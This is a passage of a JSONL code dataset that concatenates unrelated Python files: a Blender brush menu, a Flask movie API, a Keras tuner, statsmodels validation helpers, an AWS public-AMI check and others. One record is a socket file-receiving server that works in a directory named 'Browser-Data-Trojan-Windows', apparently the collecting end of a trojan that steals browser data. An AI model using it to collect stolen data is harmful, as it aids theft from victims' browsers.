disable=True, custom_disable_exp=(item.name, current_brush),\n path=True\n )\n if mode == 'VERTEX_PAINT':\n if item.use_paint_vertex:\n # 
if you are in vertex paint mode and the brush\n # is a vertex paint brush add the brush to the menu\n utils_core.menuprop(\n column_flow.row(), item.name,\n 'bpy.data.brushes[\"%s\"]' % item.name,\n brush_datapath[mode], icon=brush_icon[mode][item.vertex_tool],\n disable=True, custom_disable_exp=(item.name, current_brush),\n path=True\n )\n if mode == 'WEIGHT_PAINT':\n if item.use_paint_weight:\n # if you are in weight paint mode and the brush\n # is a weight paint brush add the brush to the menu\n utils_core.menuprop(\n column_flow.row(), item.name,\n 'bpy.data.brushes[\"%s\"]' % item.name,\n brush_datapath[mode], icon=brush_icon[mode][item.vertex_tool],\n disable=True, custom_disable_exp=(item.name, current_brush),\n path=True\n )\n if utils_core.get_mode() == 'TEXTURE_PAINT':\n if item.use_paint_image:\n # if you are in texture paint mode and the brush\n # is a texture paint brush add the brush to the menu\n utils_core.menuprop(\n column_flow.row(), item.name,\n 'bpy.data.brushes[\"%s\"]' % item.name,\n brush_datapath[mode], icon=brush_icon[mode][item.image_tool],\n disable=True, custom_disable_exp=(item.name, current_brush),\n path=True\n )\n","sub_path":"engine/2.80/scripts/addons/space_view3d_brush_menus/brushes.py","file_name":"brushes.py","file_ext":"py","file_size_in_byte":6376,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"545860208","text":"import re\ndigit_match = re.compile(r\"\\d\")\nletter_match = re.compile(r\"\\w\")\n\ndef hey(text):\n if text.strip() == \"\":\n return \"Fine. Be that way!\"\n\n no_digits = digit_match.sub(\" \", text)\n has_letters = letter_match.search(no_digits) is not None\n\n if has_letters and text.upper() == text:\n return \"Whoa, chill out!\"\n\n if text.endswith(\"?\"):\n return \"Sure.\"\n\n return \"Whatever.\"\n","sub_path":"all_data/exercism_data/python/bob/710528d7813b41359dcb809944b426ad.py","file_name":"710528d7813b41359dcb809944b426ad.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"638855815","text":"\nfrom gui_design import gui\nimport sys\nimport os\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom wave import plot_tmg\nfrom wave import plot_wave\nfrom wave import plot_bunch_moment\nfrom wave import plot_fft\nfrom wave import plot_all_mom\nfrom process import plot_process\nfrom process import plot_process_mom\nfrom process import process_13_15\nfrom process import betatron_13_15\nfrom process import cal_process_mom\nfrom process import quad_xy\nfrom noise import noise_analysis\nfrom extract import extract_data\nfrom extract import plot_pos\nfrom extract import adiabatic_dump\nfrom extract import betatron_ext\nfrom reflectance import reflectance\nfrom reflectance import process_ref\n##from BBA import BBA_cal\nfrom osc_quad import quad_osc\nfrom osc_quad import quad_osc_1212\nfrom zero_moment import zero\nfrom mabiki import mabiki_em\nfrom kiwamu import kiwamu_em\nfrom cmap import plot_cmap\n\nclass Application(gui.Design,object):\n def __init__(self):\n super(Application,self).__init__()\n self.select.configure(command=self._select)\n\n def _select(self):\n self.mode_num = self.num_mode.get()\n ### Home\n if self.mode_num == 16:\n self.reflesh()\n return\n ### BBA\n elif self.mode_num == 10:\n BBA_cal.extract_cal_vol()\n return\n ### mabiki\n elif self.mode_num == 14:\n mabiki_em.emittance()\n return\n ### mabiki\n elif self.mode_num == 15:\n quad_osc.emittance()\n 
return\n elif self.mode_num == 12:\n quad_osc_1212.emittance()\n return\n file_index = self.file_list.curselection()\n file_name = self.data_path+self.file_list.get(file_index[0]).replace(' ','')\n\n if not file_index: return\n ### extract\n elif self.mode_num == 5:\n extract_data.extract_vol(file_name)\n ### \n elif os.path.isdir(file_name):\n self.reflesh(path=file_name)\n else : self.act_mode(file_name=file_name)\n \n def act_mode(self,file_name):\n\n self.mode_num = self.num_mode.get()\n ### beam data\n if self.mode_num == 0:\n if 'wave_2' in file_name:\n self.memo(file_name)\n vol,mon = plot_wave.plot_wave(file_name)\n plot_bunch_moment.plot_bunch_moment(file_name,vol,mon)\n plot_fft.plot_fft(file_name,vol)\n elif 'process_2' in file_name:\n self.memo(file_name)\n vol = plot_process.plot_process(file_name)\n plot_process_mom.plot_process_mom(file_name,vol)\n ### adjust timing\n elif self.mode_num == 1:\n print(file_name)\n if 'wave_2' in file_name:\n self.memo(file_name)\n plot_tmg.plot_timing(file_name)\n ### noise\n elif self.mode_num == 2:\n if 'wave_2' in file_name:\n self.memo(file_name)\n noise_analysis.wave_noise(file_name)\n elif 'process_2' in file_name:\n self.memo(file_name)\n noise_analysis.process_noise(file_name)\n ### reflectance\n elif self.mode_num == 9:\n if 'wave_2' in file_name:\n self.memo(file_name)\n reflectance.plot_relation_reflectance(file_name)\n elif 'process_2' in file_name:\n self.memo(file_name)\n process_ref.plot_process_ref(file_name)\n ### #13 and #15\n elif self.mode_num == 3:\n if 'wave_2' in file_name:\n self.memo(file_name)\n #noise_analysis.wave_noise(file_name)\n elif 'process_2' in file_name:\n self.memo(file_name)\n process_13_15.plot_13_15(file_name)\n ### betatron osc. #13 and #15\n elif self.mode_num == 4:\n if 'wave_2' in file_name:\n self.memo(file_name)\n #noise_analysis.wave_noise(file_name)\n elif 'process_2' in file_name:\n self.memo(file_name)\n betatron_13_15.betatron(file_name)\n elif '.txt' in file_name:\n betatron_ext.plot_twiss(file_name)\n ### plot extract data\n elif self.mode_num == 6:\n if 'vol' in file_name:\n plot_pos.plot_row(file_name)\n\n ### plot extract data\n elif self.mode_num == 7:\n if 'vol' in file_name:\n adiabatic_dump.plot_dump(file_name)\n ### quad\n elif self.mode_num == 8:\n if 'process' in file_name:\n quad_xy.quad(file_name)\n ### quad\n\n elif self.mode_num == 11:\n if 'process' in file_name:\n zero.power(file_name)\n elif self.mode_num == 17:\n if 'wave' in file_name:\n plot_cmap.plot(file_name)\n\n elif self.mode_num == 13:\n if 'wave' in file_name:\n kiwamu_em.emittance(file_name)\n return\n\n \n\nif __name__==\"__main__\":\n app = Application()\n app.mainloop()\n \n \n","sub_path":"analysis/quick_analysis.py","file_name":"quick_analysis.py","file_ext":"py","file_size_in_byte":5146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"615128564","text":"# -*- coding: utf-8 -*-\n# Copyright 2018 ICON Foundation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the 
License.\n\nfrom unittest import TestCase, main\n\nfrom iconsdk.exception import AddressException, JSONRPCException\nfrom iconsdk.icon_service import IconService\nfrom iconsdk.providers.http_provider import HTTPProvider\nfrom iconsdk.utils.validation import is_score_apis\nfrom tests.example_config import BASE_DOMAIN_URL_V3_FOR_TEST, VERSION_FOR_TEST\n\n\nclass TestGetScoreApi(TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.icon_service = IconService(HTTPProvider(BASE_DOMAIN_URL_V3_FOR_TEST, VERSION_FOR_TEST))\n # Because governance always has score apis, it is proper for the test.\n cls.governance_address = \"cx0000000000000000000000000000000000000001\"\n\n def test_get_score_api(self):\n # case 0: when getting score apis successfully\n result = self.icon_service.get_score_api(self.governance_address)\n self.assertTrue(result)\n # case 1: when address is wrong - wallet address\n self.assertRaises(AddressException, self.icon_service.get_score_api,\n \"hx882efc17c2f50e0d60142b9c0e746cbafb569d8c\")\n # case 2: when address is wrong - too short\n self.assertRaises(AddressException, self.icon_service.get_score_api,\n \"cx882efc17c2f50e0d60142b9c0e746cbafb\")\n # case 3: when the address is not score id\n self.assertRaises(JSONRPCException, self.icon_service.get_score_api,\n \"cxb0776ee37f5b45bfaea8cff1d8232fbb6122ec32\")\n\n def test_validate_score_apis(self):\n result = self.icon_service.get_score_api(self.governance_address)\n self.assertTrue(result)\n self.assertTrue(is_score_apis(result))\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"tests/api_get/test_get_score_api.py","file_name":"test_get_score_api.py","file_ext":"py","file_size_in_byte":2300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"362053960","text":"# now package it all into a function\n\nimport numpy as np\nfrom skimage.feature import peak_local_max\n\ndef peak_local_max_3d(image,min_distance,threshold=0):\n\n \"\"\"Find peaks in an 3D image as intensity array.\n Peaks are the local maxima in a region of `2 * min_distance + 1`\n (i.e. peaks are separated by at least `min_distance`).\n If there are multiple local maxima with identical pixel intensities\n inside the region defined with `min_distance`,\n the coordinates of all such pixels are returned.\n\n ----------\n image : ndarray\n Input image.\n min_distance : int\n Minimum number of pixels separating peaks in a region of `2 *\n min_distance + 1` (i.e. peaks are separated by at least\n `min_distance`).\n To find the maximum number of peaks, use `min_distance=1`.\n\n Returns\n -------\n output : ndarray\n * If `indices = True` : [[x1,y1,z1],[x2,y2,z2],...] 
coordinates of peaks.\n\n Notes\n -----\n The function relies on applying scikit image's 2D peak_local_max function\n to generate a candidate list of 3D maxima which then get elliminated in a\n subsequent step to fulfill the min_distance criterion.\n\n\n \"\"\"\n\n ######### setup\n # make an array of zeros\n accumulator = np.zeros(image.shape)\n\n # accumulator for the coordinates and the coordinate intensities\n coordinateAccumulator = []\n\n ######### 2D\n # find all maxima in every 2D slice of the image\n for iz in range(0,image.shape[0]):\n\n coordinates=peak_local_max(image[iz],min_distance=min_distance)\n\n #write the max values into the accumulator at the right positions\n for coord in coordinates:\n coordValue = image[iz][coord[0],coord[1]]\n accumulator[iz,coord[0],coord[1]] = coordValue\n coordinateAccumulator.append([np.array([iz,coord[0],coord[1]]),coordValue])\n\n\n\n\n ######### 3D\n # Elliminate all that are too close together\n\n\n for maxCandidate in coordinateAccumulator:\n maxCandidate_z = maxCandidate[0][0]\n maxCandidate_x = maxCandidate[0][1]\n maxCandidate_y = maxCandidate[0][2]\n\n maxCandidate_value = maxCandidate[1]\n windowSizeHalf = int(min_distance/2)\n #print(windowSizeHalf)\n\n# print(maxCandidate_x-windowSizeHalf)\n# prnt(windowSizeHalf)\n from_x = max(0,maxCandidate_x-windowSizeHalf)\n to_x = min(image.shape[0],maxCandidate_x+windowSizeHalf)\n\n from_y = max(0,maxCandidate_y-windowSizeHalf)\n to_y = min(image.shape[1],maxCandidate_y+windowSizeHalf)\n\n from_z = max(0,maxCandidate_z-windowSizeHalf)\n to_z = min(image.shape[2],maxCandidate_z+windowSizeHalf)\n\n try:\n if(maxCandidate_value < threshold):\n accumulator[maxCandidate_z,maxCandidate_x,maxCandidate_y] = 0\n\n if(maxCandidate_value < np.amax(accumulator[from_z:to_z,from_x:to_x,from_y:to_y])):\n #print(\"test\")\n accumulator[maxCandidate_z,maxCandidate_x,maxCandidate_y] = 0\n except ValueError: #raised if `y` is empty.\n pass\n ########## output\n #\n result = np.transpose(np.nonzero(accumulator))\n return(result)\n","sub_path":"src/peak_local_max_3d.py","file_name":"peak_local_max_3d.py","file_ext":"py","file_size_in_byte":3202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"622309942","text":"from flask import Flask, jsonify, Response\nfrom flask_cors import CORS\nimport json\n\n# Initialising things needed for the application\napp = Flask(__name__)\nCORS(app)\nwith open('data/movie_metadata.json') as movief:\n jsonMovie = json.load(movief)\nwith open('data/theater_showtimes.json') as theatref:\n jsonTheatre = json.load(theatref)\n\n# API test to make sure server is correctly configured\n@app.route('/test')\ndef test():\n return jsonify({\"Test\": 200})\n\n# Returns all theatres\n# Done to make the solution more dynamic, but for this test's sake with the lower\n@app.route('/get-all-theatres')\ndef getAllTheatres():\n return jsonify(jsonTheatre), 200\n\n# Returns info regarding movie id\n@app.route('/movie-info/', methods=['GET'])\ndef getMovieInfo(id):\n # find info and return it\n for movie in jsonMovie:\n if (movie['id'] == id):\n return jsonify(movie), 200\n \n # if reach end of json and info not found\n return Response(\"{\\\"response_msg\\\": \\\"no such movies with that id\\\"}\", status=204, mimetype='application/json')\n\n# Returns info regarding theatre id\n@app.route('/theatre-info/', methods=['GET'])\ndef getTheatreInfo(id):\n # find info and return it\n for theatre in jsonTheatre:\n if (theatre['id'] == id):\n return 
jsonify(theatre), 200\n \n # if reach end of json and info not found\n return Response(\"{\\\"response_msg\\\": \\\"no such theatres with that id\\\"}\", status=204, mimetype='application/json')\n\nif __name__ == '__main__':\n app.run(debug=True)\n","sub_path":"backend/venv/backend.py","file_name":"backend.py","file_ext":"py","file_size_in_byte":1529,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"149780140","text":"from keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.optimizers import SGD\nfrom keras.callbacks import EarlyStopping\nfrom keras.layers import Dropout\nfrom tqdm import tqdm\nclass EveningTuna():\n def __init__(self,xtrain,ytrain,xtest,ytest,size=[16,16,16,1],activation=\"relu\",final_activation=\"sigmoid\",learing_rate=[0.4,0.04,0.004,0.0004],beta=1,epochs=1000):\n self.xtrain = xtrain\n self.ytrain = ytrain\n self.xtest = xtest\n self.ytest = ytest\n self.size = size\n self.activation = activation\n self.final_activation = final_activation\n self.learing_rate = learing_rate\n self.beta = beta\n self.epochs = epochs\n self.size2 = len(xtrain[0])\n\n def Eveninglution(self):\n best_stats_jpg = \"\"\n best_val = 0\n for i in tqdm(range(1,self.size[0])):\n for j in range(1,self.size[1]):\n for k in range(1,self.size[2]):\n for l in self.learing_rate:\n classif = Sequential()\n classif.add(Dense(i,activation=self.activation,input_shape=(self.size2,)))\n classif.add(Dropout(0.15))\n classif.add(Dense(j, activation=self.activation))\n classif.add(Dropout(0.15))\n classif.add(Dense(k, activation=self.activation))\n classif.add(Dropout(0.15))\n classif.add(Dense(1, activation=self.final_activation))\n classif.compile(optimizer=SGD(learning_rate=l),loss=\"mean_squared_error\",metrics=[\"accuracy\"])\n classif.fit(self.xtrain,self.ytrain,batch_size=34,epochs=self.epochs,callbacks=[EarlyStopping(monitor=\"loss\")],verbose=False)\n siema = classif.evaluate(self.xtest,self.ytest,verbose=False)\n if siema[1] > best_val:\n best_val = siema[1]\n best_stats_jpg = \"Size = [\"+str(i)+\",\"+str(j)+\",\"+str(k)+\",1] | activation = \"+str(self.activation)+\" | learing rate:\"+str(l)+\" Acc = \"+str(best_val)\n print(best_stats_jpg)\nif __name__ == \"__main__\":\n pass","sub_path":"WlasnaOptuna.py","file_name":"WlasnaOptuna.py","file_ext":"py","file_size_in_byte":2227,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"279083681","text":"\"\"\"\nEdge detection for my BSC thesis\n\"\"\"\n# -*- coding: iso-8859-15 -*-\nimport numpy as np\nimport cv2\nimport sys\n\nfrom skimage.exposure import rescale_intensity\nimport json as _json\nfrom pprint import pprint\nfrom multiprocessing import Pool\nfrom matplotlib import pyplot as plt\nimport matplotlib.image as mpimg\nfrom matplotlib.widgets import Slider, Button, RadioButtons\n\n__author__ = \"Fauszt András\"\n__email__ = \"andras.fauszt@gmail.com\"\n\nexec(open(\"C:\\\\ScanControl\\VideoMode\\\\Python\\\\venv2\\\\Scripts\\\\activate_this.py\").read())\n\n\ndef convolve(image, kernel):\n # grab the spatial dimensions of the image, along with\n # the spatial dimensions of the kernel\n (iH, iW) = image.shape[:2]\n (kH, kW) = kernel.shape[:2]\n\n # allocate memory for the output image, taking care to\n # \"pad\" the borders of the input image so the spatial\n # size (i.e., width and height) are not reduced\n pad = (kW - 1) // 2\n image = cv2.copyMakeBorder(image, pad, pad, pad, pad,\n cv2.BORDER_REPLICATE)\n output = 
np.zeros((iH, iW), dtype=\"float32\")\n\n # loop over the input image, \"sliding\" the kernel across\n # each (x, y)-coordinate from left-to-right and top to\n # bottom\n for y in np.arange(pad, iH + pad):\n for x in np.arange(pad, iW + pad):\n # extract the ROI of the image by extracting the\n # *center* region of the current (x, y)-coordinates\n # dimensions\n roi = image[y - pad:y + pad + 1, x - pad:x + pad + 1]\n\n # perform the actual convolution by taking the\n # element-wise multiplicate between the ROI and\n # the kernel, then summing the matrix\n k = (roi * kernel).sum()\n\n # store the convolved value in the output (x,y)-\n # coordinate of the output image\n output[y - pad, x - pad] = k\n\n # rescale the output image to be in the range [0, 255]\n output = rescale_intensity(output, in_range=(0, 255))\n output = (output * 255).astype(\"uint8\")\n\n # return the output image\n return output\n\n\ndef updateTrackbar1(value):\n global img\n global threshold1\n global threshold2\n threshold1 = value\n cv2.imshow('main-window', cv2.Canny(img, threshold1, threshold2))\n\n\ndef updateTrackbar2(value):\n global img\n global threshold1\n global threshold2\n threshold2 = value\n cv2.imshow('main-window', cv2.Canny(img, threshold1, threshold2))\n\n\nargs = sys.argv\ncv2.namedWindow(\"main-window\", cv2.WINDOW_NORMAL)\nimg = cv2.imread(\"C:\\\\ScanControl\\\\VideoMode\\\\Images\\\\\" + args[1], cv2.IMREAD_GRAYSCALE)\nthreshold1 = 100\nthreshold2 = 200\nprint(sys.path)\nf = open('C:\\\\ScanControl\\\\VideoMode\\\\settings.json')\ndata = _json.load(f)\nf.close()\n\nkernel = None\nmulti = None\n\nfor (key, value) in data.items():\n if key == args[2]:\n kernel = np.empty([len(value), len(value)])\n for i in range(0, len(value)):\n for j in range(0, len(value)):\n if (multi != 0) or (multi != None):\n kernel[i][j] = value[i][j] * multi\n else:\n kernel[i][j] = value[i][j]\n if key == args[3]:\n multi = value\n\nedges = cv2.Canny(img, threshold1, threshold2)\n# convoleOutput = convolve(img, kernel)\nopencvOutput = cv2.filter2D(img, -1, kernel)\ncv2.imshow(\"main-window\", opencvOutput)\n\n# cv2.createTrackbar(\"Threshold1\", \"main-window\", threshold1, 1500, updateTrackbar1)\n# cv2.createTrackbar(\"Threshold2\", \"main-window\", threshold2, 1500, updateTrackbar2)\n# cv2.imshow(\"main-window\", edges)\n\ncv2.waitKey(0)\n","sub_path":"VideoMode/Python/analizeImage.py","file_name":"analizeImage.py","file_ext":"py","file_size_in_byte":3569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"125890186","text":"import os\nimport logging\n\nfrom library.logger import set_logging\nfrom library.config import Config\nfrom library.aws.utility import Sns\n\n\ndef lambda_handler(event, context):\n \"\"\" Lambda handler to initiate to find public AMIs \"\"\"\n set_logging(level=logging.INFO)\n logging.debug(\"Initiating AMIs public access checking\")\n\n try:\n sns_arn = os.environ[\"SNS_ARN\"]\n config = Config()\n\n if not config.publicAMIs.enabled:\n logging.debug(\"AMIs public access checking disabled\")\n return\n\n logging.debug(\"Iterating over each account to initiate AMIs public access check\")\n for account_id, account_name in config.publicAMIs.accounts.items():\n payload = {\"account_id\": account_id,\n \"account_name\": account_name,\n \"regions\": config.aws.regions,\n \"sns_arn\": sns_arn\n }\n logging.debug(f\"Initiating AMIs public access checking for '{account_name}'\")\n Sns.publish(sns_arn, payload)\n except Exception:\n 
logging.exception(\"Error occurred while initiation of AMIs public access check\")\n return\n\n logging.debug(\"AMIs public access checking initiation done\")\n","sub_path":"hammer/identification/lambdas/ami-public-access-issues-identification/initiate_to_desc_public_ami_issues.py","file_name":"initiate_to_desc_public_ami_issues.py","file_ext":"py","file_size_in_byte":1245,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"480453156","text":"import socket\nimport tqdm\nimport os\n\nSERVER_HOST = \"0.0.0.0\"\nSERVER_PORT = 5679\nBUFFER_SIZE = 8192\nSEPARATOR = b\"\"\n\n\n\ndef server():\n os.chdir(r'C:\\Users\\Shockz\\Desktop\\Browser-Data-Trojan-Windows')\n\n #Creo el socket\n sckt = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n #Enlazamos el socket a ese host y puerto\n sckt.bind((SERVER_HOST, SERVER_PORT))\n #5 peticiones max\n sckt.listen(5)\n\n print(f\"[-] Escuchando como {SERVER_HOST}:{SERVER_PORT}\")\n try:\n client_socket, address = sckt.accept()\n print(f\"[-] {address} esta conectado.\")\n\n received = client_socket.recv(BUFFER_SIZE)\n filename, filesize = received.split(SEPARATOR)\n filename = os.path.basename(filename)\n filesize = int(filesize)\n progress = tqdm.tqdm(range(filesize), f\"Receiving {filename}\", unit=\"B\", unit_scale=True, unit_divisor=1024)\n with open(filename, \"wb\") as f:\n while True:\n bytes_read = client_socket.recv(BUFFER_SIZE)\n if not bytes_read:\n break\n f.write(bytes_read)\n # update the progress bar\n progress.update(len(bytes_read))\n close(sckt)\n except (SystemExit,KeyboardInterrupt):\n close(sckt)\n\ndef close(sckt):\n #sckt.shutdown(socket.SHUT_RDWR)\n sckt.close()\n print(\"closed\")\n","sub_path":"Sockets/sckt_server.py","file_name":"sckt_server.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"315154437","text":"import numpy as np\nimport pandas as pd\n\n\ndef _right_squeeze(arr, stop_dim=0):\n \"\"\"\n Remove trailing singleton dimensions\n\n Parameters\n ----------\n arr : ndarray\n Input array\n stop_dim : int\n Dimension where checking should stop so that shape[i] is not checked\n for i < stop_dim\n\n Returns\n -------\n squeezed : ndarray\n Array with all trailing singleton dimensions (0 or 1) removed.\n Singleton dimensions for dimension < stop_dim are retained.\n \"\"\"\n last = arr.ndim\n for s in reversed(arr.shape):\n if s > 1:\n break\n last -= 1\n last = max(last, stop_dim)\n\n return arr.reshape(arr.shape[:last])\n\n\ndef array_like(obj, name, dtype=np.double, ndim=1, maxdim=None,\n shape=None, order='C', contiguous=False):\n \"\"\"\n Convert array-like to an array and check conditions\n\n Parameters\n ----------\n obj : array_like\n An array, any object exposing the array interface, an object whose\n __array__ method returns an array, or any (nested) sequence.\n name : str\n Name of the variable to use in exceptions\n dtype : {None, numpy.dtype}\n Required dtype. Default is double. If None, does not change the dtype\n of obj (if present) or uses NumPy to automatically detect the dtype\n ndim : {int, None}\n Required number of dimensions of obj. If None, no check is performed.\n If the numebr of dimensions of obj is less than ndim, additional axes\n are inserted on the right. See examples.\n maxdim : {int, None}\n Maximum allowed dimension. 
Use ``maxdim`` instead of ``ndim`` when\n inputs are allowed to have ndim 1, 2, ..., or maxdim.\n shape : {tuple[int], None}\n Required shape obj. If None, no check is performed. Partially\n restricted shapes can be checked using None. See examples.\n order : {'C', 'F'}\n Order of the array\n contiguous : bool\n Ensure that the array's data is contiguous with order ``order``\n\n Examples\n --------\n Convert a list or pandas series to an array\n >>> import pandas as pd\n >>> x = [0, 1, 2, 3]\n >>> a = array_like(x, 'x', ndim=1)\n >>> a.shape\n (4,)\n\n >>> a = array_like(pd.Series(x), 'x', ndim=1)\n >>> a.shape\n (4,)\n >>> type(a.orig)\n pandas.core.series.Series\n\n Squeezes singleton dimensions when required\n >>> x = np.array(x).reshape((4, 1))\n >>> a = array_like(x, 'x', ndim=1)\n >>> a.shape\n (4,)\n\n Right-appends when required size is larger than actual\n >>> x = [0, 1, 2, 3]\n >>> a = array_like(x, 'x', ndim=2)\n >>> a.shape\n (4, 1)\n\n Check only the first and last dimension of the input\n >>> x = np.arange(4*10*4).reshape((4, 10, 4))\n >>> y = array_like(x, 'x', ndim=3, shape=(4, None, 4))\n\n Check only the first two dimensions\n >>> z = array_like(x, 'x', ndim=3, shape=(4, 10))\n\n Raises ValueError if constraints are not satisfied\n >>> z = array_like(x, 'x', ndim=2)\n Traceback (most recent call last):\n ...\n ValueError: x is required to have ndim 2 but has ndim 3\n\n >>> z = array_like(x, 'x', shape=(10, 4, 4))\n Traceback (most recent call last):\n ...\n ValueError: x is required to have shape (10, 4, 4) but has shape (4, 10, 4)\n\n >>> z = array_like(x, 'x', shape=(None, 4, 4))\n Traceback (most recent call last):\n ...\n ValueError: x is required to have shape (*, 4, 4) but has shape (4, 10, 4)\n \"\"\"\n arr = np.asarray(obj, dtype=dtype, order=order)\n if maxdim is not None:\n if arr.ndim > maxdim:\n msg = '{0} must have ndim <= {1}'.format(name, maxdim)\n raise ValueError(msg)\n elif ndim is not None:\n if arr.ndim > ndim:\n arr = _right_squeeze(arr, stop_dim=ndim)\n elif arr.ndim < ndim:\n arr = np.reshape(arr, arr.shape + (1,) * (ndim - arr.ndim))\n if arr.ndim != ndim:\n msg = '{0} is required to have ndim {1} but has ndim {2}'\n raise ValueError(msg.format(name, ndim, arr.ndim))\n if shape is not None:\n for actual, req in zip(arr.shape, shape):\n if req is not None and actual != req:\n req_shape = str(shape).replace('None, ', '*, ')\n msg = '{0} is required to have shape {1} but has shape {2}'\n raise ValueError(msg.format(name, req_shape, arr.shape))\n if contiguous:\n arr = np.ascontiguousarray(arr, dtype=dtype)\n return arr\n\n\nclass PandasWrapper(object):\n \"\"\"\n Wrap array_like using the index from the original input, if pandas\n\n Parameters\n ----------\n pandas_obj : {Series, DataFrame}\n Object to extract the index from for wrapping\n\n Notes\n -----\n Raises if ``orig`` is a pandas type but obj and and ``orig`` have\n different numbers of elements in axis 0. 
Also raises if the ndim of obj\n is larger than 2.\n \"\"\"\n\n def __init__(self, pandas_obj):\n self._pandas_obj = pandas_obj\n self._is_pandas = isinstance(pandas_obj, (pd.Series, pd.DataFrame))\n\n def wrap(self, obj, columns=None, append=None, trim_start=0, trim_end=0):\n \"\"\"\n Parameters\n ----------\n :param obj:\n :param columns:\n :param append:\n :param trim_start:\n :param trim_end:\n :return:\n\n Returns\n -------\n wrapper : callable\n Callable that has one required input and one optional:\n\n * `obj`: array_like to wrap\n * `columns`: (optional) Column names or series name, if obj is 1d\n * `trim_start`: (optional, default 0) number of observations to drop\n from the start of the index, so that the index applied is\n index[trim_start:]\n * `trim_start`: (optional, default 0) number of observations to drop\n from the end of the index , so that the index applied is\n index[:nobs - trim_end]\n \"\"\"\n obj = np.asarray(obj)\n if not self._is_pandas:\n return obj\n\n if obj.shape[0] + trim_start + trim_end != self._pandas_obj.shape[0]:\n raise ValueError('obj must have the same number of elements in '\n 'axis 0 as orig')\n index = self._pandas_obj.index\n index = index[trim_start:index.shape[0] - trim_end]\n if obj.ndim == 1:\n if columns is None:\n name = getattr(self._pandas_obj, 'name', None)\n elif isinstance(columns, str):\n name = columns\n else:\n name = columns[0]\n if append is not None:\n name = append if name is None else name + '_' + append\n\n return pd.Series(obj, name=name, index=index)\n elif obj.ndim == 2:\n if columns is None:\n columns = getattr(self._pandas_obj, 'columns', None)\n if append is not None:\n new = []\n for c in columns:\n new.append(append if c is None else str(c) + '_' + append)\n columns = new\n return pd.DataFrame(obj, columns=columns, index=index)\n else:\n raise ValueError('Can only wrap 1 or 2-d array_like')\n","sub_path":"statsmodels/tools/validation/validation.py","file_name":"validation.py","file_ext":"py","file_size_in_byte":7214,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"372312849","text":"#!/usr/bin/python\n\nimport sys, re, glob, os, shutil\n\ndef main():\n \"\"\"\n \"\"\"\n from optparse import OptionParser\n parser = OptionParser()\n parser.add_option('--input', dest='input', type='string', help=\"vcf input file directory path.\")\n parser.add_option('--output', dest='output', type='string', help=\"output file name.\")\n parser.add_option('--output-dir', dest='outputdir', type='string', help=\"output directore.\")\n (opts, args) = parser.parse_args()\n\n if not os.path.isdir(opts.outputdir):\n os.mkdir(opts.outputdir)\n\n if opts.input:\n input_dir=opts.input+'/output/'\n files=glob.glob(input_dir + \"*/table/*.LargeDeletion.txt\")\n else:\n sys.exit()\n \n with open(\"%s/allyears.csv\" % opts.outputdir, \"w\") as output:\n for fname in files:\t\n samplename=os.path.basename(fname).split('.')[0] # sample name (last column)\n with open(fname, 'r') as f:\n next(f)\n for line in f:\n chrname=line.split('\\t')[0]; start=line.split('\\t')[4]; stop=line.split('\\t')[5]\n newline='\\t'.join([chrname, start, stop, 'DEL', samplename])\n if \"NA\" not in newline:\n output.write(newline); output.write(\"\\n\")\n shutil.copy(\"%s/allyears.csv\" % opts.outputdir, opts.output)\n \nif __name__ == '__main__':\n 
main()\n","sub_path":"tools/contra/contra_large_del.py","file_name":"contra_large_del.py","file_ext":"py","file_size_in_byte":1395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"} +{"seq_id":"288660891","text":"from .heuristic_politics import heuristic_politics\nfrom .pairs_generation_politics import pairs_generation_politics\nfrom .crossover_politics import crossover_politics, crossover_pc_politics\nfrom .mutation_politics import mutation_politics\nfrom .selection_politics import selection_politics, selection_politics_dict\n\nfrom copy import deepcopy\n\nbasic_politics = {\n \"normal\": {\n \"heuristic_politics\": heuristic_politics[[\"MonteCarlo\"]],\n \"pairs_generation_politics\": pairs_generation_politics[\"light\"],\n \"crossover_politics\": crossover_pc_politics[\"basic\"],\n \"mutation_politics\": mutation_politics[\"light\"],\n \"selection_politics\": selection_politics_dict[\"light\"],\n },\n \"stuck\": {\n \"pairs_generation_politics\": pairs_generation_politics[\"kicker\"],\n \"crossover_politics\": crossover_pc_politics[\"kicker\"],\n \"mutation_politics\": mutation_politics[\"kicker\"],\n \"selection_politics\": selection_politics_dict[\"kicker\"],\n },\n}\n\nbasic_greedy_politics = deepcopy(basic_politics)\nbasic_greedy_politics[\"normal\"][\"heuristic_politics\"] = heuristic_politics[\n [\"MonteCarlo\", \"NearestCity\"]\n]\n\nbasic_dfs_politics = deepcopy(basic_politics)\nbasic_dfs_politics[\"normal\"][\"heuristic_politics\"] = heuristic_politics[[\"DFS\"]]\n\nbasic_dfs_greedy_politics = 